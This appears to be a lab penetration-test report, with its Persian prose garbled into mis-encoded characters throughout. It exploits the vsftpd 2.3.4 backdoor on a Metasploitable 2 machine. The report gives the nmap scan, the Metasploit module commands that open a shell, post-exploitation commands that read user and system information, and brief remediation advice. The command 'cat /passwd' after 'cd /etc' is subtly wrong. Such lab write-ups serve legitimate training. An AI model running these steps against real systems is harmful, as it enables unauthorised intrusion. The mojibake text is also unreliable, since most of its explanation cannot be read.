
---

## ๐ ฺฏุฒุงุฑุด ุชุณุช ูููุฐ โ ูพูุฑุช 21 (FTP)

### ๐ฏ ุนููุงู: Exploitation of vsftpd 2.3.4 Backdoor via Port 21

---

### ๐งฉ ุงุทูุงุนุงุช ูุฏู:

* **ุณุณุชู ูุฏู:** Metasploitable 2
* **ุขุฏุฑุณ IP:** `192.168.x.x`
* **ูพูุฑุช ุจุฑุฑุณโุดุฏู:** `21/tcp`
* **ุณุฑูุณ:** FTP
* **ูุณุฎู:** vsftpd 2.3.4

---

### ๐ ูุฑุงุญู ุงูุฌุงู ุชุณุช:

#### 1. **ุงุณฺฉู ุงููู ุจุง Nmap**

```bash
nmap -sV -p 21 192.168.x.x
```

๐ ุฎุฑูุฌ:

```
21/tcp open ftp vsftpd 2.3.4
```

---

#### 2. **ุงุฌุฑุง Metasploit**

```bash
./msfconsole
```

#### 3. **ุฌุณุชุฌู ุงฺฉุณูพููุช**

```bash
search vsftpd
```

#### 4. **ุงูุชุฎุงุจ ูุงฺูู ููุงุณุจ**

```bash
use exploit/unix/ftp/vsftpd_234_backdoor
```

#### 5. **ุชูุธู ุขุฏุฑุณ IP ูุฏู**

```bash
set RHOSTS 192.168.x.x
```

#### 6. **ุงุฌุฑุง ุงฺฉุณูพููุช**

```bash
run
```

๐ ูุชุฌู:

```
[*] Command shell session 1 opened (192.168.x.x:21)
```

---

### ๐ป ุฏุณุชูุฑุงุช ุงุฌุฑุง ุดุฏู ุฏุฑ ุดู ุจุงุฒุดุฏู:

```bash
whoami       --> ftp
uname -a     --> Linux metasploitable ...
ls -la       --> ูุณุช ูุงูโูุง ู ูุณุฑูุง
cd /etc      --> ุชุบุฑ ูุณุฑ ุจุฑุง ุจุฑุฑุณ ุชูุธูุงุช ุณุณุชู
cat /passwd  --> ุจุฑุฑุณ ฺฉุงุฑุจุฑุงู ุณุณุชู
```

---

### ๐ง ุชุญูู ุขุณุจโูพุฐุฑ:

* ูุณุฎู `vsftpd 2.3.4` ุฏุงุฑุง ุจฺฉโุฏูุฑ ุดูุงุฎุชูโุดุฏูโุง ูุณุช ฺฉู ุจุง ุงุฑุณุงู username ุฎุงุต (`:)`) ุจุงุนุซ ุจุงุฒ ุดุฏู ฺฉ shell ูุดู.
* ุงู ุงฺฉุณูพููุช ุจุฏูู ูุงุฒ ุจู ุฑูุฒ ุนุจูุฑ ุนูู ูโฺฉูู.
* ุณุทุญ ุฏุณุชุฑุณ ุจู ุตูุฑุช ูุญุฏูุฏ (ftp user) ูู ูุงุจู ุงุฑุชูุง ูุณุช.

---

### ๐ ูพุดููุงุฏ ุงููุช:

* ุจูโุฑูุฒุฑุณุงู ููุฑ ุจู ูุณุฎู ุงููโุชุฑ vsftpd (ูุซูุงู 3.x)
* ุจุณุชู ูพูุฑุช 21 ุฑู ูุงุฑูุงู ุงฺฏุฑ ูุงุฒ ุจู FTP ูุณุช
* ุงุณุชูุงุฏู ุงุฒ SFTP ุจุง ุงุญุฑุงุฒ ููุช ูู

---

